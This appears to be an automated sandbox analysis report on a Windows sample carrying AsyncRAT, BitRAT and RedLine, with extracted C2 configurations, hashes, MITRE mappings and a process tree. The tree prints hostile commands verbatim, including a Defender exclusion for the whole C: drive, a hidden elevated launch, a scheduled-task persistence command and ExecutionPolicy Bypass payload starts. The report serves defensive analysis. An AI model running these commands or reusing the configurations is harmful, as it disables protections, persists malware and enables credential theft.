asyncrat | c7dc6a8a03f4b02dd7bd2171adf105d40af49cd5a5d58d890aec160f3bc8ab3b

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

libgmp.so.16.so.exe
Size

1.8MB
MD5

eeb6ba8314046a14bcfb132f787bed16
SHA1

a1061be651c6b4e43c0085d0ff7b45500f9e8ceb
SHA256

c7dc6a8a03f4b02dd7bd2171adf105d40af49cd5a5d58d890aec160f3bc8ab3b
SHA512

9808690a2c810f7875d8f8a2ce70c3c962967d565f2f476bff7e80ee0fd8a59be4520e72c3b85991cd1e581946a5cddecbf1af674d76f7e004e061fee3907758
SSDEEP

49152:o0OB/3taBrb/TMvO90d7HjmAFd4A64nsfJ4OngXG/jpCcOhz1:c347Z

Score

10^/10

asyncrat bitrat redline xenarmor cheat new collection discovery infostealer password persistence rat recovery spyware stealer trojan upx

Malware Config

Extracted

Family

asyncrat

Version

1.0.7 - modded by last

Botnet

New

nicehash.at:4343

Mutex

adsasutex_qwqdanchun

Attributes

delay
1
install
true
install_file
GoogleDriver.exe
install_folder
%AppData%

aes.plain

Extracted

Family

bitrat

Version

1.38

nicehash.at:6000

Attributes

communication_password
005f16f264f006578c55237781f36898
install_dir
JavaHelper
install_file
Java.exe
tor_process
tor

Extracted

Family

redline

Botnet

cheat

nicehash.at:1338

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\rdln.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\rdln.exe	family_redline
behavioral2/memory/3972-196-0x00000000000B0000-0x00000000000CE000-memory.dmp	family_redline

XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
recovery password xenarmor

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\JavaHelper\Unknown.dll	acprotect
C:\Users\Admin\AppData\Local\JavaHelper\Unknown.dll	acprotect

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\wmosdpocnhuzcuhtkdelammdjbgslihd.exe	asyncrat
C:\Users\Admin\AppData\Roaming\wmosdpocnhuzcuhtkdelammdjbgslihd.exe	asyncrat
behavioral2/memory/1920-160-0x00000236F2A50000-0x00000236F2A66000-memory.dmp	asyncrat
C:\Users\Admin\AppData\Roaming\GoogleDriver.exe	asyncrat
C:\Users\Admin\AppData\Roaming\GoogleDriver.exe	asyncrat

Executes dropped EXE 6 IoCs

Processes:

wmosdpocnhuzcuhtkdelammdjbgslihd.exeGoogleDriver.exebit.exerdln.exeJava.exeJava.exe

pid process

1920 wmosdpocnhuzcuhtkdelammdjbgslihd.exe
3468 GoogleDriver.exe
368 bit.exe
3972 rdln.exe
224 Java.exe
3104 Java.exe

pid	process
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
3468	GoogleDriver.exe
368	bit.exe
3972	rdln.exe
224	Java.exe
3104	Java.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\bit.exe	upx
C:\Users\Admin\AppData\Local\Temp\bit.exe	upx
behavioral2/memory/368-183-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/368-187-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/224-205-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
C:\Users\Admin\AppData\Local\JavaHelper\Java.exe	upx
behavioral2/memory/224-209-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/224-210-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/224-213-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/224-212-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
C:\Users\Admin\AppData\Local\JavaHelper\Java.exe	upx
behavioral2/memory/224-231-0x0000000000400000-0x00000000008DC000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmosdpocnhuzcuhtkdelammdjbgslihd.exeGoogleDriver.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	GoogleDriver.exe

Loads dropped DLL 1 IoCs

Processes:

Java.exe

pid process

3104 Java.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3104	Java.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

Java.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Java.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

bit.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exe"	bit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exeȀ"	bit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exe㌀"	bit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exe餀"	bit.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

bit.exe

pid process

368 bit.exe
368 bit.exe
368 bit.exe
368 bit.exe
368 bit.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

bit.exeJava.exe

description pid process target process

PID 368 set thread context of 224 368 bit.exe Java.exe
PID 224 set thread context of 3104 224 Java.exe Java.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3088 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4212 timeout.exe

pid	process
368	bit.exe
368	bit.exe
368	bit.exe
368	bit.exe
368	bit.exe

description	pid	process	target process
PID 368 set thread context of 224	368	bit.exe	Java.exe
PID 224 set thread context of 3104	224	Java.exe	Java.exe

pid	process
3088	schtasks.exe

pid	process
4212	timeout.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exewmosdpocnhuzcuhtkdelammdjbgslihd.exepowershell.exeGoogleDriver.exepowershell.exerdln.exeJava.exe

pid	process
3972	powershell.exe
3972	powershell.exe
2012	powershell.exe
2012	powershell.exe
1280	powershell.exe
1280	powershell.exe
2192	powershell.exe
2192	powershell.exe
344	powershell.exe
344	powershell.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
1944	powershell.exe
1944	powershell.exe
3468	GoogleDriver.exe
4864	powershell.exe
4864	powershell.exe
3468	GoogleDriver.exe
3972	rdln.exe
3972	rdln.exe
3104	Java.exe
3104	Java.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exewmosdpocnhuzcuhtkdelammdjbgslihd.exeGoogleDriver.exepowershell.exebit.exepowershell.exerdln.exeJava.exe

description	pid	process
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
Token: SeDebugPrivilege	3468	GoogleDriver.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeShutdownPrivilege	368	bit.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	3972	rdln.exe
Token: SeDebugPrivilege	3104	Java.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

bit.exe

pid process

368 bit.exe
368 bit.exe

pid	process
368	bit.exe
368	bit.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

libgmp.so.16.so.exepowershell.execmd.exepowershell.execmd.exepowershell.execmd.exewmosdpocnhuzcuhtkdelammdjbgslihd.execmd.execmd.exeGoogleDriver.execmd.exepowershell.execmd.exepowershell.exebit.exeJava.exe

description	pid	process	target process
PID 3548 wrote to memory of 3972	3548	libgmp.so.16.so.exe	powershell.exe
PID 3548 wrote to memory of 3972	3548	libgmp.so.16.so.exe	powershell.exe
PID 3972 wrote to memory of 1292	3972	powershell.exe	cmd.exe
PID 3972 wrote to memory of 1292	3972	powershell.exe	cmd.exe
PID 1292 wrote to memory of 2012	1292	cmd.exe	powershell.exe
PID 1292 wrote to memory of 2012	1292	cmd.exe	powershell.exe
PID 3548 wrote to memory of 1280	3548	libgmp.so.16.so.exe	powershell.exe
PID 3548 wrote to memory of 1280	3548	libgmp.so.16.so.exe	powershell.exe
PID 1292 wrote to memory of 2292	1292	cmd.exe	fsutil.exe
PID 1292 wrote to memory of 2292	1292	cmd.exe	fsutil.exe
PID 1280 wrote to memory of 5084	1280	powershell.exe	cmd.exe
PID 1280 wrote to memory of 5084	1280	powershell.exe	cmd.exe
PID 5084 wrote to memory of 2192	5084	cmd.exe	powershell.exe
PID 5084 wrote to memory of 2192	5084	cmd.exe	powershell.exe
PID 5084 wrote to memory of 3948	5084	cmd.exe	fsutil.exe
PID 5084 wrote to memory of 3948	5084	cmd.exe	fsutil.exe
PID 3548 wrote to memory of 344	3548	libgmp.so.16.so.exe	powershell.exe
PID 3548 wrote to memory of 344	3548	libgmp.so.16.so.exe	powershell.exe
PID 344 wrote to memory of 3772	344	powershell.exe	cmd.exe
PID 344 wrote to memory of 3772	344	powershell.exe	cmd.exe
PID 3772 wrote to memory of 1920	3772	cmd.exe	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
PID 3772 wrote to memory of 1920	3772	cmd.exe	wmosdpocnhuzcuhtkdelammdjbgslihd.exe
PID 1920 wrote to memory of 1040	1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe	cmd.exe
PID 1920 wrote to memory of 1040	1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe	cmd.exe
PID 1920 wrote to memory of 2368	1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe	cmd.exe
PID 1920 wrote to memory of 2368	1920	wmosdpocnhuzcuhtkdelammdjbgslihd.exe	cmd.exe
PID 1040 wrote to memory of 3088	1040	cmd.exe	schtasks.exe
PID 1040 wrote to memory of 3088	1040	cmd.exe	schtasks.exe
PID 2368 wrote to memory of 4212	2368	cmd.exe	timeout.exe
PID 2368 wrote to memory of 4212	2368	cmd.exe	timeout.exe
PID 2368 wrote to memory of 3468	2368	cmd.exe	GoogleDriver.exe
PID 2368 wrote to memory of 3468	2368	cmd.exe	GoogleDriver.exe
PID 3468 wrote to memory of 3628	3468	GoogleDriver.exe	cmd.exe
PID 3468 wrote to memory of 3628	3468	GoogleDriver.exe	cmd.exe
PID 3628 wrote to memory of 1944	3628	cmd.exe	powershell.exe
PID 3628 wrote to memory of 1944	3628	cmd.exe	powershell.exe
PID 1944 wrote to memory of 368	1944	powershell.exe	bit.exe
PID 1944 wrote to memory of 368	1944	powershell.exe	bit.exe
PID 1944 wrote to memory of 368	1944	powershell.exe	bit.exe
PID 3468 wrote to memory of 4812	3468	GoogleDriver.exe	cmd.exe
PID 3468 wrote to memory of 4812	3468	GoogleDriver.exe	cmd.exe
PID 4812 wrote to memory of 4864	4812	cmd.exe	powershell.exe
PID 4812 wrote to memory of 4864	4812	cmd.exe	powershell.exe
PID 4864 wrote to memory of 3972	4864	powershell.exe	rdln.exe
PID 4864 wrote to memory of 3972	4864	powershell.exe	rdln.exe
PID 4864 wrote to memory of 3972	4864	powershell.exe	rdln.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 368 wrote to memory of 224	368	bit.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe
PID 224 wrote to memory of 3104	224	Java.exe	Java.exe

C:\Users\Admin\AppData\Local\Temp\libgmp.so.16.so.exe
"C:\Users\Admin\AppData\Local\Temp\libgmp.so.16.so.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Process cmd \"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3972

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1
3⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath 'C:\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\fsutil.exe
fsutil file createnew C:\Users\Admin\AppData\Roaming\excluded.txt 1
4⤵
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Process cmd \"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1
3⤵
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath 'C:\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\system32\fsutil.exe
fsutil file createnew C:\Users\Admin\AppData\Roaming\excluded.txt 1
4⤵
PID:3948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Process cmd \"/k start %AppData%\wmosdpocnhuzcuhtkdelammdjbgslihd.exe\" -WindowStyle hidden"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /k start %AppData%\wmosdpocnhuzcuhtkdelammdjbgslihd.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3772

C:\Users\Admin\AppData\Roaming\wmosdpocnhuzcuhtkdelammdjbgslihd.exe
C:\Users\Admin\AppData\Roaming\wmosdpocnhuzcuhtkdelammdjbgslihd.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1040

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"'
6⤵
- Creates scheduled task(s)
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCE41.tmp.bat""
5⤵
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\system32\timeout.exe
timeout 3
6⤵
- Delays execution with timeout.exe
PID:4212

C:\Users\Admin\AppData\Roaming\GoogleDriver.exe
"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3468

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bit.exe"' & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bit.exe"'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944

C:\Users\Admin\AppData\Local\Temp\bit.exe
"C:\Users\Admin\AppData\Local\Temp\bit.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:368

C:\Users\Admin\AppData\Local\JavaHelper\Java.exe
-a "C:\Users\Admin\AppData\Local\f7283604\plg\JHf57t9P.json"
10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:224

C:\Users\Admin\AppData\Local\JavaHelper\Java.exe
-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"' & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864

C:\Users\Admin\AppData\Local\Temp\rdln.exe
"C:\Users\Admin\AppData\Local\Temp\rdln.exe"
9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\JavaHelper\Java.exe

Filesize
1.4MB

MD5
32d4216d4ef2af912921fc2931c0bd88

SHA1
3e79dd260b67ed27134246e9461d8878c7ac73e3

SHA256
d1ecf0f3592c06329182cbcd25fa654bb48c441c0b54bfb5c4b40fbaa517cdbf

SHA512
7a25bcf3954238ab946ce95dc4153518fe67e773845f2bd037eac64c93906223b3ec611a04160cc20f85c4afa0b7124c8eacb43667ecb3fdde2776698f5b2b37

Download Submit
C:\Users\Admin\AppData\Local\JavaHelper\Java.exe

Filesize
1.4MB

MD5
32d4216d4ef2af912921fc2931c0bd88

SHA1
3e79dd260b67ed27134246e9461d8878c7ac73e3

SHA256
d1ecf0f3592c06329182cbcd25fa654bb48c441c0b54bfb5c4b40fbaa517cdbf

SHA512
7a25bcf3954238ab946ce95dc4153518fe67e773845f2bd037eac64c93906223b3ec611a04160cc20f85c4afa0b7124c8eacb43667ecb3fdde2776698f5b2b37

Download Submit
C:\Users\Admin\AppData\Local\JavaHelper\License.XenArmor

Filesize
104B

MD5
4f3bde9212e17ef18226866d6ac739b6

SHA1
732733bec8314beb81437e60876ffa75e72ae6cd

SHA256
212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174

SHA512
10b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744

Download Submit
C:\Users\Admin\AppData\Local\JavaHelper\License.XenArmor

Filesize
104B

MD5
bf5da170f7c9a8eae88d1cb1a191ff80

SHA1
dd1b991a1b03587a5d1edc94e919a2070e325610

SHA256
e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd

SHA512
9e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e

Download Submit
C:\Users\Admin\AppData\Local\JavaHelper\Unknown.dll

Filesize
793KB

MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
C:\Users\Admin\AppData\Local\JavaHelper\Unknown.dll

Filesize
793KB

MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
12efdf287ccde9be0310b0ce12f62d57

SHA1
94defb43877b89cf4f4445575ce6e996c4c24c96

SHA256
1639dad8878d2307e62adbc8cba08e4b31791f5032e02d343f149f4a447e79f9

SHA512
bf9a1a3c0d080c84cb8180f09222b6b8e29fc53a0a596e4b47f6290d3a91789292f31a9461b0262f8cfd75ccad1deab726c954045995e68ea20c937d41724a1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
89429484bc0fda735203c13ffb8bac44

SHA1
daaa562e93eb71cc5c71d846820204314ae18361

SHA256
273dce0a0f3617d30d4266e0624400e0f3e8331a452016ba4df6ef2694adc4e0

SHA512
36cba50a9f31ca6787afe41370945f7370aff1bab8caa01075dbaaa11421f1aeea19f55ba09d3ea02fe5842c20714b84ea82f2519dc54c01f74becda4b2fa44f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
